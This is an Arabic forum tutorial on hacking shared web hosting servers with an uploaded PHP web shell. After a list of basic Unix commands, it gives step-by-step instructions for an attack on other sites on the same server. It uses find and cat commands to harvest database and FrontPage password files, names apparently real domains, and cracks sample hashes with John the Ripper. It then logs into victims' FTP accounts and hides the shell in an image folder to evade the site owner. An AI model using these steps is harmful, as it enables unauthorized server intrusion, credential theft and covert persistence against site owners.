الاختراق عن طريق phpshell

نبدأ درسنا طبعا الكل بيسمع عن phpshell لاكن مين بيعرفه جيدا او استخدمه من قبل

طبعا المبتدئين ما بيعرفو حتى معناه او ميزته.

الاختراق عن طريق phpshell بيعتمد فى الاساس على اختراقك لموقع اى موقع على النت

وبعدين تحمل عليه phpshell وتبدا فى عملية السيطرة على السرفر كله اى الشركة

المستضيفة للموقع كل المواقع المستضافة عليها بتكون ملكك اذا احسنت استخدام

phpshell وفى الدرس هنعلمك اذاى تسفيد من الشيل الى اقصى درجة ممكنة.

انا مش هتكلم عن رفعك phpshell الحين لاكنى هتكلم عنك كانك رفعته لانى محضر ليكم هدية

فى موضوع الرفع المهم انت الحين اخترقت موقع عن طريق مثلا صغرة فرونت بيج ودخلت على ftp

وحملت الشل وما تخاف من التحميل ده مجرد فولدر بتحمله على الموقع ونمبداء فى استخدام الشل

عن طريق المتصفح وبيكون فيه سطر اوامر مثل الليونكس تمام ونفس اوامر الليونكس هى اوامر

phpshell علشان كدانا بنصحك بعد قرائة الدرس البحث عن اوامر الليونكس كده تمام احنا على الشل

تعمل ايه انت الان ليس من صلاحياتك انك تعدل فى اى شىء لاكنك مسموح لك بقرائة مجموعة كبيرة جدا من ملفات السرفر

وديه ميزة كبيرة جدا لازم نستغلها طيب انا اعرف كلمات السر منين ؟

طبعا كل الشركات المستضيفة بتحاول توفر افضل الخدمات للمواقع المستضافة ذى دعم الفرونت بيج

وده بيكون لعبتنا وما تنسى الشيل ما بعمل الاعلى سرفرات اليونكس الليونكس وفى الحالة العادية مش الساف مود

بعض اوامر الشيل

-----------------------------------------------------

A

access : لفحص ملف من حيث امكانيه القراءة , الكتابة ..

at : لتنفيذ امر في تاريخ ووقت معين

alarm : لعمل منبه

accept : لقبول اتصال على سوكيت .

B

batch : لتنفيذ امر عندما يحصل على تصريح

buildhash : مدقق املائي

C

cat : لعرض محتوى اكثر من ملف مع بعض

cd : لتغير الدليل الذي انت عليه

chmod : لتغير تصريح دخلول ملف معين

chown : لتغير مالك ملف معين

clear : لمسح كل الذي على الشاشة

cmp : لمقارنة ملفين

cp : لنسخ الملفات

crypt : لتشفير و فك تشفير الملفات

csplit : لتقسيم الملف الى عدة ملفات

cu : لطلب تريمنال يونكس اخر

D

date : لاظهار التاريخ و الساعة

df : لتقديم تقرير عن مساحه القرص ( المساحه الخالية .. )

diff : لمقارنه ملفين

diff3 : لمقارنه 3 ملفات او اكثر

dircmp : لمقارنه دليلان

du : تقرير عن مساحه القرض المستخدم

E

echo : يستخدم لاظهار سطر نكتب فيه تيكست

text editor : ed ( مثل الورد يعني )

egrep : مثل الامر grep

text editor : ex ( مثل الورد يعني )

F

file : للتقرير عن نوع ملف

find : للبحث عن ملفات

finger : تقرير عن مستخدم

G

++g : كومبيلر لل C++ و C

gcc : كومبيلر لل C++ و C

grep : يستخدم للبحث عن شئ داخل ملف

gzip : لضغط ملفات

gunzip : لضغط ملفات

H

haltsys : لاغلاق النظام

head : لاظهار اول 10 اسطر من الملف

I

ispell : مدقق املائي

K

** kill : لانهاء عمليه

L

line : لقراءة ملف سطر معين في ملف

ln : لعمل لينك ملف معين

logname : للحصول على اسم الدخول الخاص بك

lpr : ارسال طلب للطباعه

lprint : للطباعه بالطابعه المحليه

lpstat : لتقديم تقرير عن حاله الطباعه

lpq : لتقديم تقرير عن حاله الطباعه

ls : لعرض محتويات مجلد

M

mail : لارسال و استقبال ايميلات

man : للحصول على معلومات عن اي امر

mkdir : لعمل دليل جديد

more : لعرض الملفات

P

passwd : لانشاء كملة سر او تغيره

pr : لطباعه ملف

ps : العمليات عن العمليات التي تم تشغيلها

pstat : لعرض حالة النظام

pwd : لعرض المسار الذي انت فيه الان

R

rm : لمسح ملفات او مجلدات ( خاليه )

rmdir : لمسح مجلد ( خالي )

اوامر الشيل منقولة من

Pharaonics Team

----------------------------------------

نبداء بالسهل الاول

وهو البحث عن كلمات السر لقواعدالبيانات

لو عاوز تخترق قواعد البيانات وكلمات السر الغير مشفرة اكتب

find / -name config.php

هيجيلك كل البرامج الى فيها الكونفيج على السرفر بهذا الشكل

--------------------------------------------------------------------------------

usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/config.php

usr/local/plesk/apache/vhosts/idks.ws/httpdocs/phpsite/_vti_cnf/config.php

usr/local/plesk/apache/vhosts/idks.ws/httpdocs/forum/config.php

usr/local/plesk/apache/vhosts/dudewherestherave.net/httpdocs/phpBB2/config.php

usr/local/plesk/apache/vhosts/ukraine-today.com/httpdocs/config.php

usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/forum/config.php

usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/mylinks/cache/config.php

usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/newbb/config.php

usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/news/cache/config.php

usr/local/plesk/apache/vhosts/galazxy.com/httpdocs/k21/modules/system/cache/config.php

usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/blacktalons/admin/config.php

usr/local/plesk/apache/vhosts/eliteclans.net/httpdocs/forum/config.php

usr/local/plesk/apache/vhosts/kunjip.net/httpdocs/bbs/config.php

usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/forum/config.php

usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php

--------------------------------------------------------------------------------

وعلشان تعرف تشوف الى داخل الملف تكتب

cat /usr/local/plesk/apache/vhosts/thirdeye-dod.com/httpdocs/phpBB2/config.php

راح يظهرلك مثلا صفحة الكونفيج

وفيها كلمة المرور واليوزر نيم واسم قاعدة البينات

الى بتخص البرنامج phpBB2 الى كلنا عرفينه (منتدى) الى امتداده على الموقع

WWW.thirdeye-dod.com/phpBB2

وتقدر تشبك مع قاعدة البيانات من خلال البرنامج ده

MySQL-Front

طيب احنا الحين خلصنا من كلمات السر الغير مشفرة ندخل بقى على الجد

وذى ما قلت فى الاعلى كل الشركات بتحاول تقدم افضل دعم للمستخدم ومن هذه الدواعم

الفرونت بيج وده الى راح يفتح لنا البوابة الكبيرة للسرفر

انتو طبعا عرفين ان الملف الى بيكون فيه كلمة السر فى الفرونت بيج

vti_pvt/service.pwd

انا مش هقولك مكان الملف على السرفر لاكنك عارف بالطبع مكانه على الموقع ليش انا مابريد اقول مكانه على السرفر

لان كل سرفر له تقسيمة خاصة لنظم الملفات المهم ايه الحل البديل الحل هو انك تكتب امر البحث عن الملف

find / -name service.pwd

احنا فى الامر الى فات قولنا ابحث فى (/) يعنى فى الجزر الرئيسى عن الملف service.pwd وهتكون النتيجة مثلا

--------------------------------------------------------------------------------

usr/local/plesk/apache/vhosts/nextstagetheater.com/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/motherlobe.com/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/urbanspacesny.com/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/mysticalgammon.com/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/qfx.us/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/intranet.rpec.net/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/rayonierpamill.com/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service.pwd

--------------------------------------------------------------------------------

طبعا ده عدد قليل جدا من المواقع انت هيظهرلك على الاقل 100 موقع حسب عدد المواقع الى على السرفر

طيب احنا استفدنا ايه من النواتج للبحث ؟

استفدنا كثير فمثلا انا عرفت ان كلمة السر الخاصة بموقع pamillsite.com

موجودة على الامتداد ده

usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service.pwd

اى انى لو كتبت

cat /usr/local/plesk/apache/vhosts/pamillsite.com/httpdocs/_vti_pvt/service.pwd

راح يعرض لى كلمت السر الخاصة بالموقع شفت ان الموضوع سهل جد وما محتاج اى تعب

ناتى لفك التشفير

لا تفك تشفير موقع وتنتظر الناتج ده مش عملى على الاطلاق انت تجمع كل كلمات السر الى على السرفر

وتضعها فى ملف واحد باسم

passwd.txt

وهيكون مثلا شكله

---------------------

jthomas:p9wJhyXfDlEIk

ifabc:uyFtvzEic6WbU

joram:dx8064QfE1HfA

akron:HxcPUY85ni/j2

hpoe:9B1k8oG5Jp/Uo

amwab:6vCYtKGUyLO3s

antsi:A2FDHZxUzq2XM

hsheini:NI7HeAEGXR1BM

nskribneDBdOXeHxL6lc

besta:8apscPCSCmLV.

bibic:k8G2BP0kMWdb2

bobpr:6UgBiD.w6ybRU

---------------------

حيث p9wJhyXfDlEIk

كلمة السر المشفرة

jthomas اليوزر نيم

والبرنامج كدا راح يكون اسرع وهتحصل على نتائج فى اقل من خمس ثوانى

واعتقد ان الاخ joun هيفدكم اتكككم معاه

اهلا بيكم اخوانى

انا راح اعطيكم مجموعة من الاوامر تمش عليها بالترتيب وراح تفك اكثر من 60 فى المائة فى اقل من دقيقة

نبداء على بركة الله

--------------------------

john -single passwd.txt

john -savemem:3 passwd.txt

john -digits passwd.txt

john -i:alpha passwd.txt

john -i:all passwd.txt

-------------------------

اخوانى اهم شىء الترتيب من الاعلى

بعد اما فكيت كلمة السر الى بتلاقيها فى الملف john.pot

هتفتحه على النوت باد هيظهرلك الاتى

----------------------

GKFr8t.h31s/6:cipell

39JkE7aN1.W7w:ideia

w5ArwaUy1rfIM:juntolli

toh9pFhI1.MsQ:pradotel

cXbFL4K4ZcIXE:balada29

SZqqtC/L8lHOM:123456

8fgJCj3Jab0bE:123456

SCcoLYxDqIGzc:hendrix

tTkN3kEGY2kCc:metal

---------------------

طبعا ذى انتو ما شيفين السطر نصفين كلمة السر المشفرة

وكلمة السر بعد الكسر

المشفرة:GKFr8t.h31s/6

المكسورة:cipell

طيب ترجع لملف كلمات السر وتبحث عن كلمة السر المشفرة الى انت فكيتها هذه

GKFr8t.h31s/6

وتشوف ايه اليوزر نيم الخاص بيها

اهلا اخوانى

تدخل على ftp الخاص بالموقع وتكتب اليوزر نيم وكلمة السر

هتقولى فى مواقع لما بكتب اف تى بى واسم الموقع ما بيفتح

وفى مواقع بدخلنى على الخدمة من غير كلمة سر ولا يوز نيم

انا اقوله اكيد وده مش مشكلة ممكن نحلها

اكتب

ftp://cipell@pamillsite.com/

حيث cipell اليوزر نيم

وهو راح يسالك عن كلمة المرور وبكدا تدخل على الموقع وتعمل الى انت عاوزه

هتلاقى ملفات الموقع فى احد الامتدادات الاتية

------------

www

او

public_html

او

httpdocs

------------

لاكنى انصحكم بان تضع الشيل على الموقع وما تغير شىء فيه ويكون فى مكان مش ظاهر

يعنى فولدر للصور او اى شىء من هذا حتى ما يلاحظ صاحب الموقع ويغلقه

وما تستفاد انت اى شىء